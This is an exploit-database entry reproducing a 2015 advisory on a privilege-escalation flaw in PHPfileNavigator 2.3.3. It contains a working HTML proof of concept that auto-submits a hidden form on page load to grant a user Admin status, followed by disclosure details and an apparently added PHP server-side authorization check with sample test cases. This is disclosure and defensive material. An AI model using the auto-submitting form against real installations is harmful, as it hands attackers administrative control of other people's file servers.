PHPfileNavigator 2.3.3 Privilege Escalation Exploit

2015-08-16T00:00:00
ID 1337DAY-ID-24060
Type zdt
Reporter John Page
Modified 2015-08-16T00:00:00

Description

Exploit for php platform in category web applications

                                        

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812b.txt



Vendor:
=========================
pfn.sourceforge.net



Product:
=====================================================
PHPfileNavigator v2.3.3 (pfn)

A state-of-the-art, open source, web-based application
to completely manage your files and folders.



Vulnerability Type:
=============================
Privilege Escalation



CVE Reference:
==============
N/A




Vulnerability Details:
=====================
We can elevate privileges from those of a regular user
to Admin level. For the attack to succeed and escalate
privileges to Admin, you need to know your ID for the
'id_usuario' field when executing the attack.

Tested using xampp-1.7.0


Exploit code(s):
===============

<!DOCTYPE>
<html>
<script>
function pwn(){
var e=document.getElementById('ELEVATO_DE_PRIVLOS')
e.submit()

}
</script>
<body onLoad="pwn()">


<!-- Escalate privs to that of Admin -->

<form id="ELEVATO_DE_PRIVLOS" action="
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/gdar.php"
method="post">
<input type="hidden" name="id_usuario" value="5" />
<input type="text" id="nome" name="nome" value="b2" class="text"
tabindex="10" />
<input type="text" id="usuario" name="usuario" value="b2" class="text"
tabindex="20" />
<input type="password" id="contrasinal" name="contrasinal"
value="abc123" class="text" tabindex="30" />
<input type="password" id="rep_contrasinal" name="rep_contrasinal"
value="abc123" class="text" tabindex="40" />
<input type="text" id="email" name="email" value="[email protected]" class="text"
tabindex="50" />
<input type="text" id="max_descargas" name="max_descargas" value="0"
class="text" tabindex="60" />
<input type="text" id="actual_descargas" name="actual_descargas"
value="0" class="text" tabindex="70" />
<select id="cambiar_datos" name="cambiar_datos" tabindex="75">
<option value="1" >ON</option>
<option value="0" selected="selected">OFF</option>
</select>
<select id="id_grupo" name="id_grupo" tabindex="80">
<option value="1" selected="selected">Administrators</option>
</select>
<select id="admin" name="admin" tabindex="90">
<option value="1" selected="selected">ON</option>
<option value="0">OFF</option>
</select>
<select id="estado" name="estado" tabindex="100">
<option value="1" selected="selected">ON</option>
<option value="0" >OFF</option>
</select>
<input type="checkbox" id="Fraices_1" name="Fraices[]" value="1"
class="checkbox" />
</form>

</body>
</html>




Disclosure Timeline:
=========================================================
Vendor Notification: August 8, 2015
Public Disclosure: August 12, 2015



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s): [+] POST


Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn)


Vulnerable Parameter(s): [+] id_grupo, admin, id_usuario


Affected Area(s): [+] Admin
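
A server-side authorization check for the three parameters listed above, shown as an added example (not code from PHPfileNavigator or from the advisory author). The session key names, the list of self-editable fields and the function name are assumptions; only the POST field names come from the advisory.

```php
<?php
// Added example, not PHPfileNavigator code. Session keys and the list of
// self-editable fields are assumptions; field names come from the advisory.

const PRIVILEGED_FIELDS = ['id_grupo', 'admin'];   // role-bearing fields
const SELF_EDITABLE     = ['nome', 'contrasinal', 'rep_contrasinal', 'email'];

/**
 * Decide what an account-update POST may change, using the server-side
 * session only. Returns the fields that may be written; throws otherwise.
 */
function authorize_user_update(array $session, array $post): array
{
    $target = filter_var($post['id_usuario'] ?? null, FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 1]]);
    if ($target === false) {
        throw new InvalidArgumentException('id_usuario must be a positive integer');
    }
    // Admin status is read from the session, never from the request body.
    if (($session['admin'] ?? 0) === 1) {
        return ['id_usuario' => $target] + $post;
    }
    // A non-admin may only touch the record bound to their own session.
    if ($target !== ($session['id_usuario'] ?? null)) {
        throw new RuntimeException('403: cannot edit another account');
    }
    // Reject rather than silently drop, so the attempt shows up in logs.
    $denied = array_intersect(PRIVILEGED_FIELDS, array_keys($post));
    if ($denied !== []) {
        throw new RuntimeException('403: role fields from non-admin: ' . implode(',', $denied));
    }
    return ['id_usuario' => $target] + array_intersect_key($post, array_flip(SELF_EDITABLE));
}

// Constructed sample sessions and requests (not captured traffic).
$regular  = ['id_usuario' => 5, 'admin' => 0];
$admin    = ['id_usuario' => 1, 'admin' => 1];
$escalate = ['id_usuario' => '5', 'nome' => 'b2', 'id_grupo' => '1', 'admin' => '1'];
$profile  = ['id_usuario' => '5', 'nome' => 'b2', 'email' => 'user@example.test'];

foreach ([[$regular, $escalate], [$regular, $profile], [$admin, $escalate]] as [$s, $p]) {
    try {
        echo 'allowed: ', json_encode(authorize_user_update($s, $p)), PHP_EOL;
    } catch (Exception $e) {
        echo 'denied:  ', $e->getMessage(), PHP_EOL;
    }
}
```

If the self-service form legitimately posts the user's current id_grupo, compare the submitted value against the stored one instead of rejecting its presence outright.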
